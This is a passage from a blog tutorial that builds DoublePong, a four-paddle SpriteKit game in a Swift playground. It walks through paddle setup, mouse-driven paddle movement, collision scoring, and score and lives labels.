    topPaddle = createNode(color: themeColor, size: horizontalPaddleSize, name: "topPaddle", dynamic: false, friction: 0, restitution: 1, cBM: topPaddleI, cTBM: Ball, position: CGPoint(x: randomHorizontalPosition, y: frame.maxY - 50))
    bottomPaddle = createNode(color: themeColor, size: horizontalPaddleSize, name: "bottomPaddle", dynamic: false, friction: 0, restitution: 1, cBM: bottomPaddleI, cTBM: Ball, position: CGPoint(x: randomHorizontalPosition, y: frame.minY + 50))
    leftPaddle = createNode(color: themeColor, size: verticalPaddleSize, name: "leftPaddle", dynamic: false, friction: 0, restitution: 1, cBM: leftPaddleI, cTBM: Ball, position: CGPoint(x: frame.minX + 50, y: randomVerticalPosition))
    rightPaddle = createNode(color: themeColor, size: verticalPaddleSize, name: "rightPaddle", dynamic: false, friction: 0, restitution: 1, cBM: rightPaddleI, cTBM: Ball, position: CGPoint(x: frame.maxX - 50, y: randomVerticalPosition))
}

As you can see, we are first defining our sizes and some random positions for our paddles. Then, we use the helper method that was included in Extensions.swift (which you should have downloaded earlier in this tutorial) to quickly create each paddle with the size and theme color we set earlier.

The cBM is the categoryBitMask, and it tells SpriteKit which of the bit masks (that we created earlier) identifies this sprite. It goes hand in hand with the cTBM, the contactTestBitMask, which tells SpriteKit which sprites it should send a collision notification for. For example, if our cTBM for the right paddle was leftPaddle, it would send a notification (which we haven't set up yet) when it collides with the left paddle. Here, we are setting all of the contact test bit masks to Ball, because they will all collide with the ball.

Now that we have set up all of the required sprites, go ahead and add the following line to the bottom of didMove(to:), which will add all the sprites to the scene.

addChilds(ball, topPaddle, bottomPaddle, leftPaddle, rightPaddle)

If you now run the playground, you'll see the sprites are all created and the ball will start bouncing around!

Mouse control

Before we set up our collision detection, we need to register for mouse events, which will allow us to move the paddles based on where the user moves their mouse. We'll create a new function named registerForMouseEvents(on:), which we can call to register for mouse events on our view:

func registerForMouseEvents(on view: SKView) {
    let options: NSTrackingArea.Options = [.activeAlways, .inVisibleRect, .mouseEnteredAndExited, .mouseMoved] as NSTrackingArea.Options
    let trackingArea = NSTrackingArea(rect: view.frame, options: options, owner: self, userInfo: nil)
    view.addTrackingArea(trackingArea)
}

We are setting up our tracking options, specifically, to only get events in the visible rect, and to get mouse entered, exited, and moved events.
We are then using NSTrackingArea to add the tracking area to our view based on its frame size. Call the new function at the top of didMove(to:):

registerForMouseEvents(on: view)

We will now create a new function where we handle the mouse events and move the paddles accordingly. This involves quite a bit of maths and calculations to make the paddles "snap" at the screen edges and keep the paddles from exiting our scene! Override the mouseMoved(with:) function, where we'll first set up some variables to make it easier to calculate the new positions of the paddles.

override public func mouseMoved(with event: NSEvent) {
    super.mouseMoved(with: event)

    // Using different padding sizes creates a "click" when the user moves the paddle to the screen edge

    /// Minimum padding for the "click" to activate
    let clickPadding: CGFloat = 65
    /// Bare minimum padding for horizontal paddles
    let horizontalPadding: CGFloat = 25
    /// Bare minimum padding for vertical paddles
    let verticalPadding: CGFloat = 27
    /// Half the length of the paddles
    let halfPaddleLength: CGFloat = 275 // 550 divided by 2
    /// The size of the screen
    let screenSize = CGSize(width: 1920, height: 1080)
    /// The location of the mouse
    let location = event.location(in: self)
}

I have added comments to each variable to make it clear what they all do, so you don't get confused when calculating the paddle locations.
Now, we'll add the actual calculations below the new variables, starting with the top and bottom paddles:

if location.x < screenSize.width - clickPadding - halfPaddleLength, location.x > halfPaddleLength + clickPadding {
    topPaddle.position.x = location.x
    bottomPaddle.position.x = location.x
} else if location.x > screenSize.width - clickPadding - halfPaddleLength {
    topPaddle.position.x = screenSize.width - halfPaddleLength - horizontalPadding
    bottomPaddle.position.x = screenSize.width - halfPaddleLength - horizontalPadding
} else if location.x < halfPaddleLength + clickPadding {
    topPaddle.position.x = halfPaddleLength + horizontalPadding
    bottomPaddle.position.x = halfPaddleLength + horizontalPadding
}

We are using an if statement to calculate the position based on the variables we defined earlier. If the mouse location is within the scene size (with the padding included), we'll simply use the location for the paddles. Note how we are adding the paddle length to make sure the entire paddle is within the area. Otherwise, if the mouse location is outside the padding, we'll use the "maximum location", or the "minimum location" if it's outside the padding on the left side. Using this padding system means that when the user moves their mouse to the very edge of the screen, it will snap the paddles to the max/min location, making it feel nice and clicky.
We'll do the same for the left and right paddles, following the same pattern:

if location.y < screenSize.height - clickPadding - halfPaddleLength, location.y > clickPadding + halfPaddleLength {
    leftPaddle.position.y = location.y
    rightPaddle.position.y = location.y
} else if location.y > screenSize.height - clickPadding - halfPaddleLength {
    leftPaddle.position.y = screenSize.height - verticalPadding - halfPaddleLength
    rightPaddle.position.y = screenSize.height - verticalPadding - halfPaddleLength
} else if location.y < clickPadding + halfPaddleLength {
    leftPaddle.position.y = halfPaddleLength + verticalPadding
    rightPaddle.position.y = halfPaddleLength + verticalPadding
}

If you now run your playground, you will notice that moving your mouse now moves the paddles as expected!

Detecting collisions

Next, we will detect collisions to increase the score when the ball hits the paddles without hitting the edges of the screen. Add a new variable to Global.swift where we can track the score:

public var score = 0

We'll then add a new function which detects collisions and acts accordingly.

public func didBegin(_ contact: SKPhysicsContact) {
    let firstContactedBody = contact.bodyA.node?.name
    let secondContactedBody = contact.bodyB.node?.name

    // If the ball is not one of the bodies that contacted, skip everything else
    guard secondContactedBody == "ball" else { return }

    // If the ball's physics body doesn't exist, there's nothing we can do except exit
    guard let ballVelocity = ball.physicsBody?.velocity else {
        fatalError("The ball must have a physics body!")
    }
}

First, we simply assign the names of the first and second bodies to variables so we can use them more easily. We then make sure that one of the bodies is the ball and that it has a physics body, otherwise we can't continue to use the collision.
Then, if the first body is one of the paddles, we'll increase the score and the velocity of the ball accordingly:

if firstContactedBody == "topPaddle" || firstContactedBody == "bottomPaddle" || firstContactedBody == "leftPaddle" || firstContactedBody == "rightPaddle" {
    let divisor: CGFloat = 40
    score += Int(abs(ballVelocity.dy / divisor))
    if -100...0 ~= ballVelocity.dx || -100...0 ~= ballVelocity.dy {
        ball.physicsBody?.velocity.dx += -300
        ball.physicsBody?.velocity.dy += -300
    } else if 0...100 ~= ballVelocity.dx || 0...100 ~= ballVelocity.dy {
        ball.physicsBody?.velocity.dx += 300
        ball.physicsBody?.velocity.dy += 300
    } else {
        let increase = CGFloat.random(in: 5...10)
        // Increase the velocity based on whether it's negative or not
        ball.physicsBody?.velocity.dx += (ballVelocity.dx < CGFloat(0)) ? -increase : increase
        ball.physicsBody?.velocity.dy += (ballVelocity.dy < CGFloat(0)) ? -increase : increase
    }
}

The new score is based on the current velocity of the ball (so you get more points as the ball speeds up). We'll also make sure the ball is going fast enough, fixing its velocity if it is too slow or increasing it if it is already fast enough. As you can see, we're using ranges, such as 0...100, to restore a normal velocity if the ball is going very slowly. Keeping the sign of the velocity is required to avoid the ball changing direction.

Your playground will now run successfully, and the ball will start speeding up as you play! However, although the score is already updating, you can't see it because we aren't displaying it anywhere.

Labels

We will now add a score label to easily see our score while playing. Add a score label to our list in Global.swift:

public var scoreLabel = NSTextField()

We'll also add a didSet observer to our original score variable, which will automatically update the score label whenever the score changes. This lets us avoid redundant code.
public var score = 0 {
    didSet {
        scoreLabel.stringValue = String(score)
    }
}

We now need to set up the new label and add it to our game view, so we'll add a new function to Scene.swift which creates our label. We're doing this in a separate function so we can add more labels later on.

func setupLabels() {
    guard let frame = view?.frame else { return }
    scoreLabel = createLabel(title: String(score), alignment: .left, size: 20.0, color: .white, hidden: false, x: 9, y: Double(frame.maxY - 24 - 9), width: 100, height: 24)
}

As you can see, we're using our convenient method from Extensions.swift to create the label and set its properties, such as position, text alignment, text size, and color.

⚠️ Note: As per the note at the top of this post, some of the code shown here was written by me a long time ago, and isn't the best. In particular, you should really avoid hard-coding the position of elements on the screen. It works for this playground because of the fixed size of the playground.

Now, we just need to call our new function and add the new label we created as a subview. Add this code to didMove(to:):

setupLabels()
addSubviews(scoreLabel)

The playground now runs successfully, and the game now works and displays your score, updating it whenever the ball collides with one of the paddles!

Lives

We're almost done building a completely functional copy of DoublePong! The last thing we need to add is lives, so that the game is over if the ball touches the edges of the screen too many times. Add a new livesLabel and its corresponding lives variable to Global.swift:

public var livesLabel = NSTextField()
public var lives = 5 {
    didSet {
        livesLabel.stringValue = String(repeating: "❤️", count: lives)
    }
}

Whenever the lives are updated, we use a method built in to String to show a heart emoji for each of the remaining lives.
As before, add a new line to setupLabels() where we'll set up our new lives label:

```swift
livesLabel = createLabel(title: String(repeating: "❤️", count: lives), alignment: .right, size: 15.0, color: .white, hidden: false, x: Double(frame.maxX - 113 - 9), y: Double(frame.maxY - 19 - 9), width: 113, height: 19)
```

The setup is the same as before for the score label, using the convenience method from Extensions.swift. Next, we'll add a new check to our collision detection to remove lives when the ball collides with the edge:

```swift
if firstContactedBody == nil {
    if lives > 1 {
        lives -= 1
    } else {
        // End game here
    }
}
```

If the user has more than one life left, we remove a life. If all the lives have been used up, we should end the game — but this blog post won't cover that.

Conclusion

You now have a working version of DoublePong, my WWDC18 scholarship submission! I chose to remove some features to make this blog post shorter, but I've added them to the example playground, available below. If you'd like, you can try to implement some features yourself, such as a game over screen and restart button, then check out my code to see how I chose to implement them (which may be different from your implementation).

Although DoublePong is a relatively good SpriteKit game, I also made this blog post in an attempt to encourage and help out students considering applying for a WWDC 2019 scholarship! I had an incredible experience last year and I strongly recommend that anyone considering an application go for it!

I hope you enjoyed this in-depth tutorial on how I built DoublePong! Make sure to subscribe below to receive future blog posts in your inbox!

Have any questions or comments? Applying for a WWDC scholarship? I'd love to answer any questions you have or help you out! Just email [email protected] and I'll try my best. Thanks for reading 🙌
https://schiavo.me/2019/building-doublepong/